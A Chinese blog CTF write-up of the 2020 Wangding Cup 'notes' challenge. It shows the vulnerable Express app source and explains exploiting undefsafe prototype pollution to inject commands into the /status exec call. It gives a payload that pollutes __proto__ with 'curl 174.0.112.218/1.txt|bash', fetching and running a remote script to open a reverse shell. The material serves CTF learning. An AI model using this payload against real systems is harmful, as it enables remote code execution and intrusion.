[网鼎杯 2020 青龙组]notes

最新推荐文章于 2023-05-16 20:09:12 发布
最新推荐文章于 2023-05-16 20:09:12 发布
阅读量1.8k 收藏 1
点赞数 4
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45708109/article/details/108233667
版权

一道原型链污染的题https://snyk.io/vuln/SNYK-JS-UNDEFSAFE-548940
undefsafe函数在2.03版本下会产生漏洞
题目源码:

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');


var app = express();
class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

    get_all_notes() {
        return this.note_list;
    }

    remove_note(id) {
        delete this.note_list[id];
    }
}

var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");


app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');

app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));


app.get('/', function(req, res, next) {
  res.render('index', { title: 'Notebook' });
});

app.route('/add_note')
    .get(function(req, res) {
        res.render('mess', {message: 'please use POST to add a note'});
    })
    .post(function(req, res) {
        let author = req.body.author;
        let raw = req.body.raw;
        if (author && raw) {
            notes.write_note(author, raw);
            res.render('mess', {message: "add note sucess"});
        } else {
            res.render('mess', {message: "did not add note"});
        }
    })

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

app.route('/delete_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to delete a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        if (id) {
            notes.remove_note(id);
            res.render('mess', {message: "delete done"});
        } else {
            res.render('mess', {message: "delete failed"});
        }
    })

app.route('/notes')
    .get(function(req, res) {
        let q = req.query.q;
        let a_note;
        if (typeof(q) === "undefined") {
            a_note = notes.get_all_notes();
        } else {
            a_note = notes.get_note(q);
        }
        res.render('note', {list: a_note});
    })

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })


app.use(function(req, res, next) {
  res.status(404).send('Sorry cant find that!');
});


app.use(function(err, req, res, next) {
  console.error(err.stack);
  res.status(500).send('Something broke!');
});


const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

漏洞点在/status路由,exec导致了任意代码执行,只需要我们污染command字典。通过command字典来执行我们的命令,例如令commads.a=ls

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })

2.传参

/edit_note下可以传三个参数,id author enote
app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

3.传入后会直接写入当前的note_list

class Notes {
    constructor() {
        this.owner = "whoknows";
        this.num = 0;
        this.note_list = {};
    }

    write_note(author, raw_note) {
        this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};
    }

    get_note(id) {
        var r = {}
        undefsafe(r, id, undefsafe(this.note_list, id));
        return r;
    }

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

接受用户传参并使用,可以利用这点命令执行
playload:`

id=__proto__&author=curl 174.0.112.218/1.txt|bash&raw=123

在这里插入图片描述在edit_note下传入参数,在访问status
在这里插入图片描述
5.开个小号在内网服务器var/www/html下写一个shell文件并监听,在访问status时就会反弹shell。
在这里插入图片描述

旸哥哥
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网鼎杯2020青龙-web
ChenZIDu的博客
05-18 933
看来反序列化要多打点了,反序列化这块都不怎么熟~ AreUSerialz 源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "
2020网鼎杯青龙赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
[网鼎杯 2020 青龙]notes(Undefsafe原型链污染)
paidx0
08-30 523
[网鼎杯 2020 青龙]notes(Undefsafe原型链污染)
undefsafe原型链&[网鼎杯 2020 青龙]notes
Je3Z的博客
08-25 569
感觉是考原型链但还是有点不知道如何下手,呜呜呜呜呜呜。 从浅入深 Javascript 原型链与原型链污染 [网鼎杯 2020 青龙]notes var express = require('express'); var path = require('path'); const undefsafe = require('undefsafe'); const { exec } = require('child_process'); var app = express(); class Notes {
2020网鼎杯青龙Boom
05-12
【标题】"2020网鼎杯青龙Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙"可能是比赛中的一个分或者阶段,可能...
20200510.网鼎杯青龙.zip
06-10
2020 5 10 网鼎杯 青龙 比赛题目 web没有附件 其他基本都有 , 感谢各位师傅的整理
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
2020网鼎杯青龙白虎部分试题.rar
05-14
2020网鼎杯青龙白虎部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次青龙难度大于白虎。
代码notes-网鼎杯
RafaelRaffaella的博客
05-16 139
【代码】代码notes-网鼎杯
网鼎杯2020-玄武签到题
自在如风
05-21 2287
题目分析 游戏题,该游戏操作通过JavaScript代码进行反馈 查看JavaScript源码,找到游戏结束部分的关键代码 解题过程 F12进入浏览器控制台,查看JavaScript源码 找到游戏操作部分的js文件,以及游戏操作结束发送数据到后端的代码,通过ajax与后端交互,发送token,返回数据 尝试将该段代码写入控制台执行 输入战队token,控制台console.log(data)输出 flag ...
CTF赛题-[网鼎杯2020青龙]AreUSerialz
m0_57379855的博客
03-25 2116
CTF赛题-[网鼎杯2020青龙]AreUSerialz代码审计构造函数 代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filenam
网鼎杯2020 青龙 -web
weixin_43610673的博客
05-16 1055
AreUSerialz <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $co
BUUCTF [BJDCTF2nd_duangshell]
veinard_F的博客
08-05 449
打开题目后是 提示是swp文件泄露 payload .index.php.swp下载文件 拖到Linux上 用命令vi -r 加路径加文件 恢复文件 得到 (将文件拖到Linux上涉及到主机和虚拟机文件共享的问题,需要在虚拟机设置上安装Vmware tools。) 观察上述代码可以发现 ...
数字经济云安全共测大赛 amazon writeup
qq_43189757的博客
09-26 344
漏洞点: 在进行free操作后没有把chunk指针置为0 所以存在UAF漏洞 思路: 泄露libc地址: 泄露libc地址比较简单,由于题目限定输入的size范围要小于0x100, 所以无法创建一个大小可以直接放入unsortedbin中的chunk, 可以先填满tchachebin, 然后在free一个chunk,这个chunk便会进入unosrtedbin 这是chunk的fd变指向了lib...
网鼎杯2018 guess(stack smashing)
seaaseesa的博客
04-30 923
wdb2018_guess stack smashing 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Flag读取并存储在栈里 Fork三次子进程,然后有gets函数,导致栈溢出,但是有canary保护。 由于使用了gets,因此可以无限制溢出,并且有三次机会。那么,我们可以利用stack smashing报错,来输出信息。第一次,我们泄露函数的got表内容,为...
网鼎杯 babyheap
MozhuCY的博客
09-21 880
网鼎杯第一场 程序功能:新建,编辑,打印,free free处没有置空指针,导致可以uaf malloc每次都是0x20的fastbin,编辑功能可以使用3次 自写了readn函数,没有溢出点 edit可以修改free后堆块的bk,fd 1 2 3 4 5 Arch: amd64-64-little RELRO: Full RELRO S...
ciscn_2019_sw_5(tcache下delete次数限制时的巧妙利用手法)
seaaseesa的博客
05-01 714
ciscn_2019_sw_5(tcache下delete次数限制时的巧妙利用手法) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,仅两个功能 其中,delete功能只能用3次,delete功能没有清空指针,存在double free漏洞。 Add功能,size不可控,结尾printf可以输出堆内容。 我们可以利用add结尾的printf输出,main_are...
青龙面板拉库检查网络
最新发布
08-10
对于青龙面板拉库检查网络的问题,您可以按照以下步骤进行操作: 1. 首先,您需要登录到青龙面板的管理界面。在浏览器中输入青龙面板的地址,并使用正确的用户名和密码登录。 2. 登录成功后,您将看到青龙面板的主...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值